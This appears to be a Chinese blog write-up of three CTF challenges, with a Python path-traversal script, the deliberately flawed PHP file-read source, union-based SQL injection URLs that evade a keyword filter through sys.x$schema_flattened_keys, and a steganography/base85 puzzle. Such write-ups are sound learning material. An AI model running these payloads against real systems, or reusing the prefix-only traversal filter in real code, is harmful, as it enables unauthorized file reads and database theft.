安恒七月赛

2020-07-26 40次浏览 0条评论  前往评论

前言


就几道题,水一下

ezfileinclude


打开题目链接后显示出来的是一张图片,查看网页源代码会在img标签种发现一个/image.php?t=xxxxx&f=base64(xxxx)

这道题目考点也是文件读取,所以利用点肯定在f这个参数了,但只是过滤了开头的../

这里用一下Hhhm师傅的脚本

import time 
import requests
import base64


file = "hhhm/../../../../../../../../flag"
file = base64.b64encode(file.encode())
url = "http://183.129.189.60:10009/image.php?t={0}&f={1}"
now = int(time.time())
rep = requests.get(url.format(str(now),file.decode()))
print(rep.text)

源码

<?php

    if(!isset($_GET['t']) || !isset($_GET['f'])){
        echo "you miss some parameters";
        exit();
    }

    $timestamp = time();

    if(abs($_GET['t'] - $timestamp) > 10){
        echo "what's your time?";
        exit();
    }

    $file = base64_decode($_GET['f']);

    if(substr($file, 0, strlen("/../")) === "/../" || substr($file, 0, strlen("../")) === "../" || substr($file, 0, strlen("./")) === "./" || substr($file, 0, strlen("/.")) === "/." || substr($file, 0, strlen("//")) === "//") {
        echo 'You are not allowed to do that.';
    }
    else{
        echo file_get_contents('/var/www/html/img/'.$file);
    }

?>

Sqil


首先fuzz之后发现正则

return preg_match("/;|benchmark|\^|if|[\s]|in|case|when|sleep|auto|desc|stat|\||lock|or|and|&|like|-|`/i", $id);

发现过滤in和or被过滤了,意味着information_schema不能使用

一般来说绕过information有两种

  • sys.x$schema_flattened_keys
  • sys.schema_table_statistics_with_buffer

但是第二种里的stat被过滤了,可以使用第一种方法,注出表名payload

http://183.129.189.60:10004/?id=0%27/**/union/**/select/**/1,2,group_concat(table_name)from/**/sys.x$schema_flattened_keys/**/where/**/table_schema=database()%23

回显

Array ( [0] => 1 [id] => 1 [1] => 2 [username] => 2 [2] => flllaaaggg,users [password] => flllaaaggg,users )

发现有flllaaaggg,users两种表,这里可以使用无列名注入,无列名注入可参考:不知道列名的情况下注入

查看users表内容

http://183.129.189.60:10004/?id=0%27/**/union/**/select/**/1,2,(select/**/group_concat(c)/**/from(select/**/1/**/as/**/a,2/**/as/**/b,3/**/as/**/c/**/union/**/select*from/**/users)x)%23

查看fllllaaaggg表内容

http://183.129.189.60:10004/?id=0%27/**/union/**/select/**/1,2,(select/**/group_concat(b)/**/from(select/**/1/**/as/**/a,2/**/as/**/b/**/union/**/select*from/**/flllaaaggg)x)%23

MISC-welcome


前面没记错的话,应该是虎符的原题吧,题目附件是两个文件,一个flag.rar 一个red_blue.png

stegsolve查看图片,Save Bin可直接得到图片提取出来发现是密码为/*///1258/*/@#

360解压打开发现

Ao(mgHXo,o0fV'I2J"^%3&**H@q.MQ1,V%$1GCdB0P"X%0RW

当时没想到是base85编码,所以没做出来

在线解密得到flag:http://ctf.ssleye.com/base85.html



登录后回复

共有0条评论